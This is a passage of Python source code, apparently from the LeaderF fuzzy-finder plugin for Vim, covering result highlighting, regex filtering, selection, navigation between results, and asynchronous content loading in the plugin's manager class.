unit = self._getUnit()
bottom = len(self._getInstance().buffer) - self._help_length
if self._cli.isAndMode:
highlight_pos_list = self._highlight_pos_list
else:
highlight_pos_list = [self._highlight_pos]
for n, highlight_pos in enumerate(highlight_pos_list):
hl_group = 'Lf_hl_match' + str(n % 5)
for i, pos in enumerate(highlight_pos):
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('%s', %s)")"""
% (self._getInstance().getPopupWinId(), hl_group, str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8]))))
self._highlight_ids.append(id)
for i, pos in enumerate(self._highlight_refine_pos):
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_matchRefine', %s)")"""
% (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
def _highlight(self, is_full_path, get_highlights, use_fuzzy_engine=False, clear=True, hl_group='Lf_hl_match'):
# matchaddpos() is introduced by Patch 7.4.330
if (lfEval("exists('*matchaddpos')") == '0' or
lfEval("g:Lf_HighlightIndividual") == '0'):
return
cb = self._getInstance().buffer
if self._getInstance().empty(): # buffer is empty.
return
highlight_number = int(lfEval("g:Lf_NumberOfHighlight"))
if clear:
self._clearHighlights()
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
unit = self._getUnit()
if self._getInstance().isReverseOrder():
if self._help_length > 0:
content = cb[:-self._help_length][::-1]
else:
content = cb[:][::-1]
else:
content = cb[self._help_length:]
if use_fuzzy_engine:
self._highlight_pos = get_highlights(source=[getDigest(line)
for line in content[:highlight_number:unit]])
else:
# e.g., self._highlight_pos = [ [ [2,3], [6,2] ], [ [1,4], [7,6], ... ], ... ]
# where [2, 3] indicates the highlight starts at the 2nd column with the
# length of 3 in bytes
self._highlight_pos = [get_highlights(getDigest(line))
for line in content[:highlight_number:unit]]
if self._cli.isAndMode:
self._highlight_pos_list.append(self._highlight_pos)
bottom = len(content)
for i, pos in enumerate(self._highlight_pos):
start_pos = self._getDigestStartPos(content[unit*i], 0 if is_full_path else 1)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('%s', %s)")"""
% (self._getInstance().getPopupWinId(), hl_group, str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8]))))
self._highlight_ids.append(id)
def _highlightRefine(self, first_get_highlights, get_highlights):
# matchaddpos() is introduced by Patch 7.4.330
if (lfEval("exists('*matchaddpos')") == '0' or
lfEval("g:Lf_HighlightIndividual") == '0'):
return
cb = self._getInstance().buffer
if self._getInstance().empty(): # buffer is empty.
return
highlight_number = int(lfEval("g:Lf_NumberOfHighlight"))
self._clearHighlights()
getDigest = self._getDigest
unit = self._getUnit()
if self._getInstance().isReverseOrder():
if self._help_length > 0:
content = cb[:-self._help_length][::-1]
else:
content = cb[:][::-1]
else:
content = cb[self._help_length:]
bottom = len(content)
self._highlight_pos = [first_get_highlights(getDigest(line, 1))
for line in content[:highlight_number:unit]]
for i, pos in enumerate(self._highlight_pos):
start_pos = self._getDigestStartPos(content[unit*i], 1)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_match', %s)")"""
% (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_match', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
self._highlight_refine_pos = [get_highlights(getDigest(line, 2))
for line in content[:highlight_number:unit]]
for i, pos in enumerate(self._highlight_refine_pos):
start_pos = self._getDigestStartPos(content[unit*i], 2)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_matchRefine', %s)")"""
% (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
def _regexFilter(self, iterable):
def noErrMatch(text, pattern):
try:
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text, pattern))
except TypeError: # python 2
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
except ValueError: # python 3
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
except:
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
try:
if ('-2' == lfEval("g:LfNoErrMsgMatch('', '%s')" % escQuote(self._cli.pattern))):
return iter([])
else:
return (line for line in iterable
if noErrMatch(escQuote(self._getDigest(line, 0)), escQuote(self._cli.pattern)))
except vim.error:
return iter([])
def _regexSearch(self, content, is_continue, step):
if not is_continue and not self._cli.isPrefix:
self._index = 0
self._result_content = self._filter(8000, self._regexFilter, content, is_continue)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
def clearSelections(self):
for i in self._selections.values():
if self._getInstance().getWinPos() == 'popup':
lfCmd("call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
lfCmd("call matchdelete(%d)" % i)
self._selections.clear()
def _cleanup(self):
if not ("--recall" in self._arguments or lfEval("g:Lf_RememberLastSearch") == '1'):
self._pattern_bak = self._cli.pattern
self._cli.clear()
self._clearHighlights()
self._clearHighlightsPos()
self._help_length = 0
self._show_help = False
@modifiableController
def toggleHelp(self):
self._show_help = not self._show_help
if self._getInstance().isReverseOrder():
if self._help_length > 0:
del self._getInstance().buffer[-self._help_length:]
else:
del self._getInstance().buffer[:self._help_length]
if self._help_length > 0 and self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! %dk')" % (self._getInstance().getPopupWinId(), self._help_length))
self._createHelpHint()
self.clearSelections()
self._resetHighlights()
def _accept(self, file, mode, *args, **kwargs):
if file:
if self._getExplorer().getStlCategory() != "Jumps":
lfCmd("norm! m'")
if self._getExplorer().getStlCategory() != "Help":
if mode == '':
pass
elif mode == 'h':
lfCmd("split")
elif mode == 'v':
lfCmd("bel vsplit")
kwargs["mode"] = mode
tabpage_count = len(vim.tabpages)
self._acceptSelection(file, *args, **kwargs)
for k, v in self._cursorline_dict.items():
if k.valid:
k.options["cursorline"] = v
self._cursorline_dict.clear()
self._issue_422_set_option()
if mode == 't' and len(vim.tabpages) > tabpage_count:
tab_pos = int(lfEval("g:Lf_TabpagePosition"))
if tab_pos == 0:
lfCmd("tabm 0")
elif tab_pos == 1:
lfCmd("tabm -1")
elif tab_pos == 3:
lfCmd("tabm")
def accept(self, mode=''):
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
lfCmd("norm! k")
return
else:
if self._getInstance().window.cursor[0] <= self._help_length:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! j')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("norm! j")
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
return
if self._getExplorer().getStlCategory() == "Rg":
if self._getInstance().currentLine == self._getExplorer().getContextSeparator():
return
if "--heading" in self._arguments and not re.match(r'^\d+[:-]', self._getInstance().currentLine):
return
self._cli.writeHistory(self._getExplorer().getStlCategory())
# https://github.com/neovim/neovim/issues/8336
if lfEval("has('nvim')") == '1':
chdir = vim.chdir
else:
chdir = os.chdir
cwd = lfGetCwd()
if len(self._selections) > 0:
files = []
for i in sorted(self._selections.keys()):
files.append(self._getInstance().buffer[i-1])
if "--stayOpen" in self._arguments:
if self._getInstance().window.valid:
self._getInstance().cursorRow = self._getInstance().window.cursor[0]
self._getInstance().helpLength = self._help_length
try:
vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos()
except vim.error: # error if the original buffer is a No Name buffer
pass
else:
self._getInstance().exitBuffer()
# https://github.com/Yggdroot/LeaderF/issues/257
win_local_cwd = lfEval("getcwd(winnr())")
if cwd != win_local_cwd:
chdir(cwd)
orig_cwd = lfGetCwd()
if mode == '' and self._getExplorer().getStlCategory() == "File":
self._accept(files[0], mode)
self._argaddFiles(files)
self._accept(files[0], mode)
lfCmd("doautocmd BufwinEnter")
else:
for file in files:
self._accept(file, mode)
if lfGetCwd() != orig_cwd:
dir_changed_by_autocmd = True
else:
dir_changed_by_autocmd = False
need_exit = True
else:
file = self._getInstance().currentLine
line_nr = self._getInstance().window.cursor[0]
need_exit = self._needExit(file, self._arguments)
if need_exit:
if "--stayOpen" in self._arguments:
if self._getInstance().window.valid:
self._getInstance().cursorRow = self._getInstance().window.cursor[0]
self._getInstance().helpLength = self._help_length
try:
vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos()
except vim.error: # error if the original buffer is a No Name buffer
pass
else:
self._getInstance().exitBuffer()
# https://github.com/Yggdroot/LeaderF/issues/257
win_local_cwd = lfEval("getcwd(winnr())")
if cwd != win_local_cwd:
chdir(cwd)
orig_cwd = lfGetCwd()
self._accept(file, mode, self._getInstance().buffer, line_nr) # for bufTag
if lfGetCwd() != orig_cwd:
dir_changed_by_autocmd = True
else:
dir_changed_by_autocmd = False
if need_exit:
self._setAutochdir()
if dir_changed_by_autocmd == False:
self._restoreOrigCwd()
return None
else:
self._beforeExit()
self._content = vim.current.buffer[:]
return False
def _jumpNext(self):
instance = self._getInstance()
if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length:
return False
if instance.isReverseOrder():
if instance.window.valid:
if instance.window.cursor[0] > len(instance.buffer) - self._help_length:
instance.window.cursor = (len(instance.buffer) - self._help_length, 0)
elif instance.window.cursor[0] == 1: # at the first line
instance.window.cursor = (len(instance.buffer) - self._help_length, 0)
else:
instance.window.cursor = (instance.window.cursor[0] - 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow > len(instance.buffer) - instance.helpLength:
instance.cursorRow = len(instance.buffer) - instance.helpLength
elif instance.cursorRow == 1: # at the last line
instance.cursorRow = len(instance.buffer) - instance.helpLength
else:
instance.cursorRow -= 1
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE"
% (len(instance.buffer) - instance.cursorRow - instance.helpLength + 1,
len(instance.buffer) - instance.helpLength))
else:
if instance.window.valid and self._getInstance().getWinPos() != 'popup':
if instance.window.cursor[0] <= self._help_length:
instance.window.cursor = (self._help_length + 1, 0)
elif instance.window.cursor[0] == len(instance.buffer): # at the last line
instance.window.cursor = (self._help_length + 1, 0)
else:
instance.window.cursor = (instance.window.cursor[0] + 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow <= instance.helpLength:
instance.cursorRow = instance.helpLength + 1
elif instance.cursorRow == len(instance.buffer): # at the last line
instance.cursorRow = instance.helpLength + 1
else:
instance.cursorRow += 1
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength))
return True
def _jumpPrevious(self):
instance = self._getInstance()
if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length:
return False
if instance.isReverseOrder():
if instance.window.valid:
if instance.window.cursor[0] >= len(instance.buffer) - self._help_length:
instance.window.cursor = (1, 0)
else:
instance.window.cursor = (instance.window.cursor[0] + 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow >= len(instance.buffer) - instance.helpLength:
instance.cursorRow = 1
else:
instance.cursorRow += 1
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE"
% (len(instance.buffer) - instance.cursorRow - instance.helpLength + 1,
len(instance.buffer) - instance.helpLength))
else:
if instance.window.valid and self._getInstance().getWinPos() != 'popup':
if instance.window.cursor[0] <= self._help_length + 1:
instance.window.cursor = (len(instance.buffer), 0)
else:
instance.window.cursor = (instance.window.cursor[0] - 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow <= instance.helpLength + 1:
instance.cursorRow = len(instance.buffer)
else:
instance.cursorRow -= 1
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength))
def quit(self):
self._getInstance().exitBuffer()
self._setAutochdir()
self._restoreOrigCwd()
def refresh(self, normal_mode=True):
self._getExplorer().cleanup()
content = self._getExplorer().getFreshContent()
if not content:
lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE")
return
if normal_mode: # when called in Normal mode
self._getInstance().buffer.options['modifiable'] = True
self._clearHighlights()
self._clearHighlightsPos()
self.clearSelections()
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._iteration_end = True
if self._cli.pattern:
self._index = 0
self._search(self._content)
if normal_mode: # when called in Normal mode
self._createHelpHint()
self._resetHighlights()
self._getInstance().buffer.options['modifiable'] = False
def addSelections(self):
nr = self._getInstance().window.number
if self._getInstance().getWinPos() != 'popup':
if (int(lfEval("v:mouse_win")) != 0 and
nr != int(lfEval("v:mouse_win"))):
return
elif nr == int(lfEval("v:mouse_win")):
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
line_nr = self._getInstance().window.cursor[0]
if self._getInstance().isReverseOrder():
if line_nr > len(self._getInstance().buffer) - self._help_length:
lfCmd("norm! k")
return
else:
if line_nr <= self._help_length:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! j')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("norm! j")
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
return
if line_nr in self._selections:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call matchdelete(%d, %d)" % (self._selections[line_nr], self._getInstance().getPopupWinId()))
else:
lfCmd("call matchdelete(%d)" % self._selections[line_nr])
del self._selections[line_nr]
else:
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_selection', '\\\\%%%dl.')")"""
% (self._getInstance().getPopupWinId(), line_nr))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % line_nr))
self._selections[line_nr] = id
def selectMulti(self):
orig_line = self._getInstance().window.cursor[0]
nr = self._getInstance().window.number
if (int(lfEval("v:mouse_win")) != 0 and
nr != int(lfEval("v:mouse_win"))):
return
elif nr == int(lfEval("v:mouse_win")):
cur_line = int(lfEval("v:mouse_lnum"))
self.clearSelections()
for i in range(min(orig_line, cur_line), max(orig_line, cur_line)+1):
if i > self._help_length and i not in self._selections:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i)))
self._selections[i] = id
def selectAll(self):
line_num = len(self._getInstance().buffer)
if line_num > 300:
lfCmd("echohl Error | redraw | echo ' Too many files selected!' | echohl NONE")
lfCmd("sleep 1")
return
for i in range(line_num):
if i >= self._help_length and i+1 not in self._selections:
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_selection', '\\\\%%%dl.')")"""
% (self._getInstance().getPopupWinId(), i+1))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i+1)))
self._selections[i+1] = id
def _gotoFirstLine(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! gg')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("normal! gg")
def _readFinished(self):
pass
def startExplorer(self, win_pos, *args, **kwargs):
arguments_dict = kwargs.get("arguments", {})
if "--recall" in arguments_dict:
self._arguments["--recall"] = arguments_dict["--recall"]
elif "--previous" in arguments_dict:
self._arguments["--previous"] = arguments_dict["--previous"]
elif "--next" in arguments_dict:
self._arguments["--next"] = arguments_dict["--next"]
else:
self.setArguments(arguments_dict)
self._cli.setNameOnlyFeature(self._getExplorer().supportsNameOnly())
self._cli.setRefineFeature(self._supportsRefine())
self._orig_line = ''
if self._getExplorer().getStlCategory() in ["Gtags"]:
if "--update" in self._arguments or "--remove" in self._arguments:
self._getExplorer().getContent(*args, **kwargs)
return
if "--next" in arguments_dict:
if self._jumpNext() == False:
lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE")
return
elif "--previous" in arguments_dict:
if self._jumpPrevious() == False:
lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE")
return
self._cleanup()
# lfCmd("echohl WarningMsg | redraw | echo ' searching ...' | echohl NONE")
self._getInstance().setArguments(self._arguments)
empty_query = self._empty_query and self._getExplorer().getStlCategory() in ["File"]
remember_last_status = "--recall" in self._arguments \
or lfEval("g:Lf_RememberLastSearch") == '1' and self._cli.pattern
if remember_last_status:
content = self._content
self._getInstance().useLastReverseOrder()
win_pos = self._getInstance().getWinPos()
else:
content = self._getExplorer().getContent(*args, **kwargs)
self._getInstance().setCwd(lfGetCwd())
if self._getExplorer().getStlCategory() in ["Gtags"] and "--auto-jump" in self._arguments \
and isinstance(content, list) and len(content) == 1:
mode = self._arguments["--auto-jump"][0] if len(self._arguments["--auto-jump"]) else ""
self._accept(content[0], mode)
return
self._index = 0
pattern = kwargs.get("pattern", "") or arguments_dict.get("--input", [""])[0]
if len(pattern) > 1 and (pattern[0] == '"' and pattern[-1] == '"'
or pattern[0] == "'" and pattern[-1] == "'"):
pattern = pattern[1:-1]
self._cli.setPattern(pattern)
self._result_content = []
self._cb_content = []
if not content:
lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE")
return
# clear the buffer only when the content is not a list
self._getInstance().enterBuffer(win_pos, not isinstance(content, list))
self._initial_count = self._getInstance().getInitialWinHeight()
self._getInstance().setStlCategory(self._getExplorer().getStlCategory())
self._setStlMode(**kwargs)
self._getInstance().setStlCwd(self._getExplorer().getStlCurDir())
if kwargs.get('bang', 0):
self._current_mode = 'NORMAL'
else:
self._current_mode = 'INPUT'
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
if not remember_last_status:
self._gotoFirstLine()
self._start_time = time.time()
self._bang_start_time = self._start_time
self._bang_count = 0
self._getInstance().buffer.vars['Lf_category'] = self._getExplorer().getStlCategory()
self._read_content_exception = None
if isinstance(content, list):
self._is_content_list = True
self._read_finished = 2
if not remember_last_status:
if len(content[0]) == len(content[0].rstrip("\r\n")):
self._content = content
else:
self._content = [line.rstrip("\r\n") for line in content]
self._getInstance().setStlTotal(len(self._content)//self._getUnit())
self._getInstance().setStlResultsCount(len(self._content))
if not empty_query:
self._getInstance().setBuffer(self._content[:self._initial_count])
if lfEval("has('nvim')") == '1':
lfCmd("redrawstatus")
self._callback = self._workInIdle
if not kwargs.get('bang', 0):
self._readFinished()
self.input()
else:
if not remember_last_status and not empty_query:
self._getInstance().appendBuffer(self._content[self._initial_count:])
elif remember_last_status and len(self._getInstance().buffer) < len(self._result_content):
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
lfCmd("echo")
if self._cli.pattern:
self._cli._buildPrompt()
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
self._getInstance().mimicCursor()
if not remember_last_status and not self._cli.pattern and empty_query:
self._gotoFirstLine()
self._guessSearch(self._content)
if self._result_content: # self._result_content is [] only if
# self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] not in [b'', '']:
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
self._getInstance().appendBuffer(self._content[self._initial_count:])
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
elif isinstance(content, AsyncExecutor.Result):
self._is_content_list = False
self._callback = self._workInIdle
if lfEval("get(g:, 'Lf_NoAsync', 0)") == '1':
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._read_finished = 1
self._offset_in_content = 0
else:
if self._getExplorer().getStlCategory() in ["Rg", "Gtags"]:
if "--append" in self.getArguments():
self._offset_in_content = len(self._content)
if self._pattern_bak:
self._getInstance().setBuffer(self._content, need_copy=False)
self._createHelpHint()
else:
self._getInstance().clearBuffer()
self._content = []
self._offset_in_content = 0
else:
self._content = []
self._offset_in_content = 0
self._read_finished = 0
self._stop_reader_thread = False
self._reader_thread = threading.Thread(target=self._readContent, args=(content,))
self._reader_thread.daemon = True
self._reader_thread.start()
if not kwargs.get('bang', 0):
self.input()
else:
lfCmd("echo")
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
self._getInstance().mimicCursor()
else:
self._is_content_list = False
self._callback = partial(self._workInIdle, content)
if lfEval("get(g:, 'Lf_NoAsync', 0)") == '1':
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._read_finished = 1
self._offset_in_content = 0
else:
self._content = []
self._offset_in_content = 0
self._read_finished = 0
if not kwargs.get('bang', 0):
self.input()
else:
lfCmd("echo")
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
self._getInstance().mimicCursor()
def _readContent(self, content):
try:
for line in content:
self._content.append(line)
if self._stop_reader_thread:
break
else:
self._read_finished = 1
except Exception:
self._read_finished = 1
self._read_content_exception = sys.exc_info()
def _setResultContent(self):
if len(self._result_content) > len(self._getInstance().buffer):
self._getInstance().setBuffer(self._result_content)
elif self._index == 0:
self._getInstance().setBuffer(self._content, need_copy=True)
@catchException
def _workInIdle(self, content=None, bang=False):
if self._read_content_exception is not None:
if bang == True:
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
lfPrintError(self._read_content_exception[1])
return
else:
raise self._read_content_exception[1]
if bang == False and self._preview_open == False and lfEval("get(g:, 'Lf_PreviewInPopup', 0)") == '1' \
and not self._getInstance().empty():
self._previewResult(False)
self._preview_open = True
if self._is_content_list:
if self._cli.pattern and (self._index < len(self._content) or len(self._cb_content) > 0):
if self._fuzzy_engine:
step = 60000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content, True, step)
return
if content:
i = -1
for i, line in enumerate(itertools.islice(content, 20)):
self._content.append(line)
if i == -1 and self._read_finished == 0:
self._read_finished = 1
if self._read_finished > 0:
if self._read_finished == 1:
self._read_finished += 1
self._getExplorer().setContent(self._content)
self._getInstance().setStlTotal(len(self._content)//self._getUnit())
self._getInstance().setStlRunning(False)
if self._cli.pattern:
self._getInstance().setStlResultsCount(len(self._result_content))
elif self._empty_query and self._getExplorer().getStlCategory() in ["File"]:
self._guessSearch(self._content)
if bang:
if self._result_content: # self._result_content is [] only if
# self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] != b'':
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
self._getInstance().appendBuffer(self._content[self._initial_count:])
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
else:
if bang:
if self._getInstance().empty():
self._offset_in_content = len(self._content)
if self._offset_in_content > 0:
self._getInstance().appendBuffer(self._content[:self._offset_in_content])
else:
cur_len = len(self._content)
if cur_len > self._offset_in_content:
self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len])
self._offset_in_content = cur_len
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
else:
self._getInstance().setBuffer(self._content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._content))
if self._getInstance().getWinPos() not in ('popup', 'floatwin'):
lfCmd("redrawstatus")
if self._cli.pattern:
if self._index < len(self._content) or len(self._cb_content) > 0:
if self._fuzzy_engine:
step = 60000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content, True, step)
if bang:
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
cur_len = len(self._content)
if time.time() - self._start_time > 0.1:
self._start_time = time.time()
self._getInstance().setStlTotal(cur_len//self._getUnit())
self._getInstance().setStlRunning(True)
if self._cli.pattern:
self._getInstance().setStlResultsCount(len(self._result_content))
else:
self._getInstance().setStlResultsCount(cur_len)
if self._getInstance().getWinPos() not in ('popup', 'floatwin'):
lfCmd("redrawstatus")
if self._cli.pattern:
if self._index < cur_len or len(self._cb_content) > 0:
if self._fuzzy_engine:
step = 60000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content[:cur_len], True, step)
else:
if bang:
if self._getInstance().empty():
self._offset_in_content = len(self._content)
if self._offset_in_content > 0:
self._getInstance().appendBuffer(self._content[:self._offset_in_content])
else:
cur_len = len(self._content)
if cur_len > self._offset_in_content:
self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len])
self._offset_in_content = cur_len
if self._getInstance().getWinPos() not in ('popup', 'floatwin') \
and time.time() - self._bang_start_time > 0.5:
self._bang_start_time = time.time()
lfCmd("echohl WarningMsg | redraw | echo ' searching %s' | echohl NONE" % ('.' * self._bang_count))
self._bang_count = (self._bang_count + 1) % 9
elif len(self._getInstance().buffer) < min(cur_len, self._initial_count):
self._getInstance().setBuffer(self._content[:self._initial_count])
@modifiableController
def input(self):
self._preview_open = False
self._current_mode = 'INPUT'
self._getInstance().hideMimicCursor()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
if self._getInstance().getWinPos() == 'popup':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')"
% (self._getInstance().getPopupWinId(), 'leaderf#PopupFilter'))
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self.clearSelections()
self._hideHelp()
self._resetHighlights()
if self._cli.pattern: # --input xxx or from normal mode to input mode
if self._index == 0: # --input xxx
self._search(self._content)
elif self._empty_query and self._getExplorer().getStlCategory() in ["File"] \
and "--recall" not in self._arguments:
self._guessSearch(self._content)
for cmd in self._cli.input(self._callback):
cur_len = len(self._content)
cur_content = self._content[:cur_len]
if equal(cmd, '<Update>'):
if self._getInstance().getWinPos() == 'popup':
if self._getInstance()._window_object.cursor[0] > 1:
lfCmd("call win_execute({}, 'norm! gg')".format(self._getInstance().getPopupWinId()))
self._search(cur_content)
elif equal(cmd, '<Shorten>'):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<Mode>'):
self._setStlMode()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._getInstance().setPopupStl(self._current_mode)
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
